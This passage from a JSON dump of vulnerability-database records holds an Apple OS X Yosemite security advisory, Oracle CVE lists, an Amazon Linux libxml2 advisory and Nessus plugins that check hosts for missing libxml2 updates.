version\r\n0.9.8zg.\r\nCVE-ID\r\nCVE-2015-1788\r\nCVE-2015-1789\r\nCVE-2015-1790\r\nCVE-2015-1791\r\nCVE-2015-1792\r\n\r\nperl\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Parsing a maliciously crafted regular expression may lead to\r\ndisclosure of unexpected application termination or arbitrary code\r\nexecution\r\nDescription: An integer underflow issue existed in the way Perl\r\nparsed regular expressions. This issue was addressed through improved\r\nmemory handling.\r\nCVE-ID\r\nCVE-2013-7422\r\n\r\nPostgreSQL\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: An attacker may be able to cause unexpected application\r\ntermination or gain access to data without proper authentication\r\nDescription: Multiple issues existed in PostgreSQL 9.2.4. These\r\nissues were addressed by updating PostgreSQL to 9.2.13.\r\nCVE-ID\r\nCVE-2014-0067\r\nCVE-2014-8161\r\nCVE-2015-0241\r\nCVE-2015-0242\r\nCVE-2015-0243\r\nCVE-2015-0244\r\n\r\npython\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Multiple vulnerabilities existed in Python 2.7.6, the most\r\nserious of which may lead to arbitrary code execution\r\nDescription: Multiple vulnerabilities existed in Python versions\r\nprior to 2.7.6. These were addressed by updating Python to version\r\n2.7.10.\r\nCVE-ID\r\nCVE-2013-7040\r\nCVE-2013-7338\r\nCVE-2014-1912\r\nCVE-2014-7185\r\nCVE-2014-9365\r\n\r\nQL Office\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Parsing a maliciously crafted Office document may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A memory corruption issue existed in parsing of Office\r\ndocuments. This issue was addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-5773 : Apple\r\n\r\nQL Office\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Parsing a maliciously crafted XML file may lead to\r\ndisclosure of user information\r\nDescription: An external entity reference issue existed in XML file\r\nparsing. This issue was addressed through improved parsing.\r\nCVE-ID\r\nCVE-2015-3784 : Bruno Morisson of INTEGRITY S.A.\r\n\r\nQuartz Composer Framework\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Parsing a maliciously crafted QuickTime file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A memory corruption issue existed in parsing of\r\nQuickTime files. This issue was addressed through improved memory\r\nhandling.\r\nCVE-ID\r\nCVE-2015-5771 : Apple\r\n\r\nQuick Look\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Searching for a previously viewed website may launch the web\r\nbrowser and render that website\r\nDescription: An issue existed where QuickLook had the capability to\r\nexecute JavaScript. The issue was addressed by disallowing execution\r\nof JavaScript.\r\nCVE-ID\r\nCVE-2015-3781 : Andrew Pouliot of Facebook, Anto Loyola of Qubole\r\n\r\nQuickTime 7\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Processing a maliciously crafted file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: Multiple memory corruption issues existed in QuickTime.\r\nThese issues were addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-3772\r\nCVE-2015-3779\r\nCVE-2015-5753 : Apple\r\nCVE-2015-5779 : Apple\r\n\r\nQuickTime 7\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Processing a maliciously crafted file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: Multiple memory corruption issues existed in QuickTime.\r\nThese issues were addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-3765 : Joe Burnett of Audio Poison\r\nCVE-2015-3788 : Ryan Pentney and Richard Johnson of Cisco Talos\r\nCVE-2015-3789 : Ryan Pentney and Richard Johnson of Cisco Talos\r\nCVE-2015-3790 : Ryan Pentney and Richard Johnson of Cisco Talos\r\nCVE-2015-3791 : Ryan Pentney and Richard Johnson of Cisco Talos\r\nCVE-2015-3792 : Ryan Pentney and Richard Johnson of Cisco Talos\r\nCVE-2015-5751 : WalkerFuz\r\n\r\nSceneKit\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Viewing a maliciously crafted Collada file may lead to\r\narbitrary code execution\r\nDescription: A heap buffer overflow existed in SceneKit's handling\r\nof Collada files. This issue was addressed through improved input\r\nvalidation.\r\nCVE-ID\r\nCVE-2015-5772 : Apple\r\n\r\nSceneKit\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: A remote attacker may be able to cause unexpected\r\napplication termination or arbitrary code execution\r\nDescription: A memory corruption issue existed in SceneKit. This\r\nissue was addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-3783 : Haris Andrianakis of Google Security Team\r\n\r\nSecurity\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A standard user may be able to gain access to admin\r\nprivileges without proper authentication\r\nDescription: An issue existed in handling of user authentication.\r\nThis issue was addressed through improved authentication checks.\r\nCVE-ID\r\nCVE-2015-3775 : [Eldon Ahrold]\r\n\r\nSMBClient\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A remote attacker may be able to cause unexpected\r\napplication termination or arbitrary code execution\r\nDescription: A memory corruption issue existed in the SMB client.\r\nThis issue was addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-3773 : Ilja van Sprundel\r\n\r\nSpeech UI\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Parsing a maliciously crafted unicode string with speech\r\nalerts enabled may lead to an unexpected application termination or\r\narbitrary code execution\r\nDescription: A memory corruption issue existed in handling of\r\nUnicode strings. This issue was addressed by improved memory\r\nhandling.\r\nCVE-ID\r\nCVE-2015-3794 : Adam Greenbaum of Refinitive\r\n\r\nsudo\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Multiple vulnerabilities existed in sudo versions prior to\r\n1.7.10p9, the most serious of which may allow an attacker access to\r\narbitrary files\r\nDescription: Multiple vulnerabilities existed in sudo versions prior\r\nto 1.7.10p9. These were addressed by updating sudo to version\r\n1.7.10p9.\r\nCVE-ID\r\nCVE-2013-1775\r\nCVE-2013-1776\r\nCVE-2013-2776\r\nCVE-2013-2777\r\nCVE-2014-0106\r\nCVE-2014-9680\r\n\r\ntcpdump\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Multiple vulnerabilities existed in tcpdump 4.7.3, the most\r\nserious of which may allow a remote attacker to cause a denial of\r\nservice.\r\nDescription: Multiple vulnerabilities existed in tcpdump versions\r\nprior to 4.7.3. These were addressed by updating tcpdump to version\r\n4.7.3.\r\nCVE-ID\r\nCVE-2014-8767\r\nCVE-2014-8769\r\nCVE-2014-9140\r\n\r\nText Formats\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Parsing a maliciously crafted text file may lead to\r\ndisclosure of user information\r\nDescription: An XML external entity reference issue existed with\r\nTextEdit parsing. This issue was addressed through improved parsing.\r\nCVE-ID\r\nCVE-2015-3762 : Xiaoyong Wu of the Evernote Security Team\r\n\r\nudf\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Processing a maliciously crafted DMG file may lead to an\r\nunexpected application termination or arbitrary code execution with\r\nsystem privileges\r\nDescription: A memory corruption issue existed in parsing of\r\nmalformed DMG images. This issue was addressed through improved\r\nmemory handling.\r\nCVE-ID\r\nCVE-2015-3767 : beist of grayhash\r\n\r\nOS X Yosemite v10.10.5 includes the security content of Safari 8.0.8:\r\nhttps://support.apple.com/en-us/HT205033\r\n\r\nOS X Yosemite 10.10.5 and Security Update 2015-006 may be obtained\r\nfrom the Mac App Store or Apple's Software Downloads web site:\r\nhttp://www.apple.com/support/downloads/\r\n\r\nInformation will also be posted to the Apple Security Updates\r\nweb site: https://support.apple.com/kb/HT201222\r\n\r\nThis message is signed with Apple's Product Security PGP key,\r\nand details are available at:\r\nhttps://www.apple.com/support/security/pgp/\r\n\r\n\r\n\r\n", "edition": 1, "modified": "2015-08-17T00:00:00", "published": "2015-08-17T00:00:00", "id": "SECURITYVULNS:DOC:32390", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32390", "title": "APPLE-SA-2015-08-13-2 OS X Yosemite v10.10.5 and Security Update 2015-006", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:03", "bulletinFamily": "software", "cvelist": ["CVE-2015-4894", "CVE-2015-4000", "CVE-2015-4851", "CVE-2015-4895", "CVE-2015-4905", "CVE-2015-4866", "CVE-2015-4832", "CVE-2015-4822", "CVE-2015-4830", "CVE-2015-4804", "CVE-2015-4816", "CVE-2015-0235", "CVE-2015-1793", "CVE-2015-4793", "CVE-2015-4863", "CVE-2015-4913", "CVE-2015-4892", "CVE-2014-0191", "CVE-2015-4796", "CVE-2015-4864", "CVE-2015-4794", "CVE-2015-4887", "CVE-2015-2642", "CVE-2015-4860", "CVE-2015-4868", "CVE-1999-0377", "CVE-2015-4820", "CVE-2015-4903", "CVE-2015-0286", "CVE-2015-4906", "CVE-2015-4843", "CVE-2015-4842", "CVE-2015-4910", "CVE-2015-4872", "CVE-2015-4846", "CVE-2014-3576", "CVE-2015-4876", "CVE-2014-3571", "CVE-2015-4883", "CVE-2014-7940", "CVE-2015-4858", "CVE-2015-4802", "CVE-2015-4882", "CVE-2015-4801", "CVE-2015-4878", "CVE-2015-4799", "CVE-2015-4811", "CVE-2015-4834", "CVE-2015-4762", "CVE-2015-4815", "CVE-2015-4812", "CVE-2015-4839", "CVE-2015-4798", "CVE-2015-4891", "CVE-2015-4734", "CVE-2015-4899", "CVE-2015-4865", "CVE-2015-4915", "CVE-2015-4871", "CVE-2015-4800", "CVE-2015-4869", "CVE-2015-4828", "CVE-2015-4803", "CVE-2015-4875", "CVE-2015-4902", "CVE-2015-4917", "CVE-2015-4909", "CVE-2015-4791", "CVE-2015-4805", "CVE-2015-4849", "CVE-2015-4879", "CVE-2015-4888", "CVE-2015-4838", "CVE-2015-4850", "CVE-2015-4806", "CVE-2015-4825", "CVE-2015-3144", "CVE-2015-4797", "CVE-2015-4792", "CVE-2015-4837", "CVE-2015-4904", "CVE-2015-4810", "CVE-2015-4827", "CVE-2014-0050", "CVE-2015-4817", "CVE-2015-4908", "CVE-2015-4912", "CVE-2015-4833", "CVE-2015-4847", "CVE-2015-4855", "CVE-2015-4848", "CVE-2015-4730", "CVE-2015-4819", "CVE-2015-4896", "CVE-2015-2633", "CVE-2015-4807", "CVE-2015-4901", "CVE-2015-4835", "CVE-2015-4873", "CVE-2015-4766", "CVE-2015-4795", "CVE-2015-4907", "CVE-2015-4859", "CVE-2015-1829", "CVE-2015-4898", "CVE-2015-4874", "CVE-2015-4836", "CVE-2015-4824", "CVE-2015-4900", "CVE-2015-4831", "CVE-2015-4861", "CVE-2015-4911", "CVE-2015-4886", "CVE-2015-2608", "CVE-2015-4809", "CVE-2015-4877", "CVE-2015-4844", "CVE-2015-4870", "CVE-2015-4881", "CVE-2015-4840", "CVE-2015-4856", "CVE-2015-4845", "CVE-2015-4914", "CVE-2015-4893", "CVE-2015-4916", "CVE-2015-4826", "CVE-2014-1569", "CVE-2015-4862", "CVE-2010-1622", "CVE-2015-4857", "CVE-2015-4890", "CVE-2015-4867", "CVE-2015-4884", "CVE-2015-4813", "CVE-2015-4841", "CVE-2015-4818", "CVE-2015-4880", "CVE-2015-1791", "CVE-2015-4823", "CVE-2015-4821"], "description": "Quarterly update closes 140 vulnerabilities in different applications.", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:VULN:14755", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14755", "title": "Oracle / Sun / PeopleSoft / MySQL multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:58", "bulletinFamily": "software", "cvelist": ["CVE-2015-0388", "CVE-2014-6574", "CVE-2015-0390", "CVE-2014-6592", "CVE-2014-3566", "CVE-2011-4461", "CVE-2015-0386", "CVE-2015-0425", "CVE-2014-6566", "CVE-2013-4784", "CVE-2014-0191", "CVE-2015-0365", "CVE-2014-6579", "CVE-2014-6556", "CVE-2014-6571", "CVE-2015-0427", "CVE-2014-6578", "CVE-2015-0398", "CVE-2014-6510", "CVE-2014-6595", "CVE-2011-3607", "CVE-2014-6518", "CVE-2015-0385", "CVE-2015-0395", "CVE-2015-0368", "CVE-2014-6575", "CVE-2015-0380", "CVE-2015-0424", "CVE-2003-0001", "CVE-2014-6565", "CVE-2015-0407", "CVE-2015-0362", "CVE-2015-0430", "CVE-2014-6585", "CVE-2015-0410", "CVE-2013-5704", "CVE-2015-0402", "CVE-2015-0379", "CVE-2014-6548", "CVE-2015-0396", "CVE-2015-0422", "CVE-2015-0435", "CVE-2014-6584", "CVE-2014-0224", "CVE-2014-4259", "CVE-2015-0391", "CVE-2014-6567", "CVE-2015-0418", "CVE-2013-0338", "CVE-2014-6480", "CVE-2014-6576", "CVE-2015-0428", "CVE-2015-0431", "CVE-2014-0098", "CVE-2014-6549", "CVE-2015-0420", "CVE-2015-0432", "CVE-2015-0383", "CVE-2011-3389", "CVE-2013-1741", "CVE-2014-6583", "CVE-2014-6597", "CVE-2014-4279", "CVE-2004-0230", "CVE-2015-0369", "CVE-2014-6525", "CVE-2015-0372", "CVE-2014-6582", "CVE-2015-0378", "CVE-2015-0392", "CVE-2015-0416", "CVE-2014-6587", "CVE-2013-6438", "CVE-2015-0406", "CVE-2015-0401", "CVE-2014-6569", "CVE-2014-6599", "CVE-2013-2877", "CVE-2015-0417", "CVE-2015-0404", "CVE-2013-6450", "CVE-2014-0114", "CVE-2015-0364", "CVE-2010-5107", "CVE-2011-3368", "CVE-2014-6573", "CVE-2013-4286", "CVE-2015-0371", "CVE-2014-6526", "CVE-2015-0382", "CVE-2014-1568", "CVE-2015-0363", "CVE-2014-6600", "CVE-2014-6580", "CVE-2014-6509", "CVE-2015-0375", "CVE-2015-0414", "CVE-2015-0413", "CVE-2014-6593", "CVE-2014-6601", "CVE-2014-6594", "CVE-2015-0373", "CVE-2015-0421", "CVE-2013-2186", "CVE-2014-3567", "CVE-2014-6581", "CVE-2015-0403", "CVE-2014-6570", "CVE-2015-0408", "CVE-2015-0429", "CVE-2014-6596", "CVE-2014-6521", "CVE-2015-0374", "CVE-2014-6591", "CVE-2014-6586", "CVE-2014-6524", "CVE-2014-6572", "CVE-2015-0370", "CVE-2015-0412", "CVE-2015-0400", "CVE-2015-0409", "CVE-2015-0387", "CVE-2015-0389", "CVE-2015-0399", "CVE-2015-0415", "CVE-2014-6590", "CVE-2015-0376", "CVE-2014-6481", "CVE-2015-0393", "CVE-2015-0366", "CVE-2015-0419", "CVE-2014-6568", "CVE-2015-0377", "CVE-2015-0394", "CVE-2015-0397", "CVE-2015-0384", "CVE-2014-6589", "CVE-2014-6528", "CVE-2014-6588", "CVE-2014-6541", "CVE-2011-1944", "CVE-2015-0437", "CVE-2014-6514", "CVE-2014-4212", "CVE-2015-0436", "CVE-2014-6598", "CVE-2015-0367", "CVE-2014-0226", "CVE-2013-1620", "CVE-2013-4545", "CVE-2015-0426", "CVE-2015-0434", "CVE-2015-0411", "CVE-2015-0381", "CVE-2014-6577"], "description": "Over 150 vulnerabilities in different applications are closed in auqrterly update.", "edition": 1, "modified": "2015-01-25T00:00:00", "published": "2015-01-25T00:00:00", "id": "SECURITYVULNS:VULN:14233", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14233", "title": "Oracle / Sun / PeopleSoft / MySQL multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "amazon": [{"lastseen": "2020-11-10T12:36:08", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0191"], "description": "**Issue Overview:**\n\nIt was discovered that libxml2, a library providing support to read, modify and write XML files, incorrectly performs entity substituton in the doctype prolog, even if the application using libxml2 disabled any entity substitution. A remote attacker could provide a specially-crafted XML file that, when processed, would lead to the exhaustion of CPU and memory resources or file descriptors.\n\n \n**Affected Packages:** \n\n\nlibxml2\n\n \n**Issue Correction:** \nRun _yum update libxml2_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n libxml2-debuginfo-2.9.1-1.1.30.amzn1.i686 \n libxml2-python-2.9.1-1.1.30.amzn1.i686 \n libxml2-2.9.1-1.1.30.amzn1.i686 \n libxml2-devel-2.9.1-1.1.30.amzn1.i686 \n libxml2-static-2.9.1-1.1.30.amzn1.i686 \n \n src: \n libxml2-2.9.1-1.1.30.amzn1.src \n \n x86_64: \n libxml2-debuginfo-2.9.1-1.1.30.amzn1.x86_64 \n libxml2-devel-2.9.1-1.1.30.amzn1.x86_64 \n libxml2-static-2.9.1-1.1.30.amzn1.x86_64 \n libxml2-2.9.1-1.1.30.amzn1.x86_64 \n libxml2-python-2.9.1-1.1.30.amzn1.x86_64 \n \n \n", "edition": 4, "modified": "2014-05-21T10:31:00", "published": "2014-05-21T10:31:00", "id": "ALAS-2014-341", "href": "https://alas.aws.amazon.com/ALAS-2014-341.html", "title": "Medium: libxml2", "type": "amazon", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}], "nessus": [{"lastseen": "2021-01-17T12:49:52", "description": "From Red Hat Security Advisory 2015:0749 :\n\nUpdated libxml2 packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having Moderate\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe libxml2 library is a development toolbox providing the\nimplementation of various XML standards.\n\nIt was discovered that libxml2 loaded external parameter entities even\nwhen entity substitution was disabled. A remote attacker able to\nprovide a specially crafted XML file to an application linked against\nlibxml2 could use this flaw to conduct XML External Entity (XXE)\nattacks, possibly resulting in a denial of service or an information\nleak on the system. (CVE-2014-0191)\n\nThe CVE-2014-0191 issue was discovered by Daniel P. Berrange of Red\nHat.\n\nAll libxml2 users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue. The desktop\nmust be restarted (log out, then log back in) for this update to take\neffect.", "edition": 24, "published": "2015-03-31T00:00:00", "title": "Oracle Linux 7 : libxml2 (ELSA-2015-0749)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0191"], "modified": "2015-03-31T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:libxml2-python", "p-cpe:/a:oracle:linux:libxml2-static", "p-cpe:/a:oracle:linux:libxml2-devel", "cpe:/o:oracle:linux:7", "p-cpe:/a:oracle:linux:libxml2"], "id": "ORACLELINUX_ELSA-2015-0749.NASL", "href": "https://www.tenable.com/plugins/nessus/82464", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2015:0749 and \n# Oracle Linux Security Advisory ELSA-2015-0749 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(82464);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2014-0191\");\n script_bugtraq_id(67233, 70644);\n script_xref(name:\"RHSA\", value:\"2015:0749\");\n\n script_name(english:\"Oracle Linux 7 : libxml2 (ELSA-2015-0749)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2015:0749 :\n\nUpdated libxml2 packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having Moderate\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe libxml2 library is a development toolbox providing the\nimplementation of various XML standards.\n\nIt was discovered that libxml2 loaded external parameter entities even\nwhen entity substitution was disabled. A remote attacker able to\nprovide a specially crafted XML file to an application linked against\nlibxml2 could use this flaw to conduct XML External Entity (XXE)\nattacks, possibly resulting in a denial of service or an information\nleak on the system. (CVE-2014-0191)\n\nThe CVE-2014-0191 issue was discovered by Daniel P. Berrange of Red\nHat.\n\nAll libxml2 users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue. The desktop\nmust be restarted (log out, then log back in) for this update to take\neffect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2015-March/004955.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libxml2 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:libxml2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:libxml2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:libxml2-python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:libxml2-static\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/03/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/31\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"libxml2-2.9.1-5.0.1.el7_1.2\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"libxml2-devel-2.9.1-5.0.1.el7_1.2\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"libxml2-python-2.9.1-5.0.1.el7_1.2\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"libxml2-static-2.9.1-5.0.1.el7_1.2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libxml2 / libxml2-devel / libxml2-python / libxml2-static\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-12T10:12:27", "description": "Update to libxml2 2.9.2\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 13, "published": "2015-01-02T00:00:00", "title": "Fedora 20 : mingw-libxml2-2.9.2-1.fc20 (2014-17573)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0191"], "modified": "2015-01-02T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:mingw-libxml2", "cpe:/o:fedoraproject:fedora:20"], "id": "FEDORA_2014-17573.NASL", "href": "https://www.tenable.com/plugins/nessus/80318", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-17573.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(80318);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-0191\");\n script_bugtraq_id(67233);\n script_xref(name:\"FEDORA\", value:\"2014-17573\");\n\n script_name(english:\"Fedora 20 : mingw-libxml2-2.9.2-1.fc20 (2014-17573)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to libxml2 2.9.2\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1107557\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-January/147322.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?fb233827\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected mingw-libxml2 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:mingw-libxml2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:20\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/12/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^20([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 20.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = 